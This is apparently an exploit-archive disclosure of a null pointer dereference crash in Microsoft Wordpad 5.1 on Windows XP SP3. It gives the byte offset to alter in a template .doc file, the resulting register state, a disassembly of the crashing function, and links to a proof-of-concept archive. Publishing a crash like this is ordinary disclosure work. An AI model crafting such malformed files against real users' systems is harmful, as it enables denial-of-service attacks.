51 lines
No EOL
1.9 KiB
Text
51 lines
No EOL
1.9 KiB
Text
Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
|
|
Found by condis
|
|
|
|
Tested on Windows XP SP 3 Proffesional PL
|
|
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)
|
|
|
|
This isn't bug from CWE 2009-0259
|
|
|
|
$ Binnary diff of template file (proper empty doc document) and malformed file
|
|
(showing just the offset that differs):
|
|
|
|
0000 1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- template file
|
|
0000 1200: 00 00 00 00 00 00 63 6F 6E 64 00 00 00 00 00 00 -- proof of concept
|
|
|
|
Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00.
|
|
|
|
Access violation when reading [00000004]
|
|
|
|
$ Registers:
|
|
|
|
eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608
|
|
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8
|
|
ebp = 0177f5cc
|
|
|
|
$ Function dump :
|
|
|
|
01b9dbb4 55 push ebp
|
|
01b9dbb5 8bec mov ebp,esp
|
|
01b9dbb7 56 push esi
|
|
01b9dbb8 8b7508 mov esi,dword ptr [ebp+8]
|
|
01b9dbbb 807e0400 cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; ---- crash
|
|
01b9dbbf 751b jne mswrd8+0x1dbdc (01b9dbdc)
|
|
01b9dbc1 8b06 mov eax,dword ptr [esi]
|
|
01b9dbc3 57 push edi
|
|
01b9dbc4 8b78fc mov edi,dword ptr [eax-4]
|
|
01b9dbc7 57 push edi
|
|
01b9dbc8 ff156010b801 call dword ptr [mswrd8+0x1060 (01b81060)]
|
|
01b9dbce 57 push edi
|
|
01b9dbcf ff157410b801 call dword ptr [mswrd8+0x1074 (01b81074)]
|
|
01b9dbd5 56 push esi
|
|
01b9dbd6 e87bfdffff call mswrd8+0x1d956 (01b9d956)
|
|
01b9dbdb 5f pop edi
|
|
01b9dbdc 5e pop esi
|
|
01b9dbdd 5d pop ebp
|
|
|
|
$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3
|
|
|
|
$ Below You should see link to attachement with PoC:
|
|
|
|
http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar |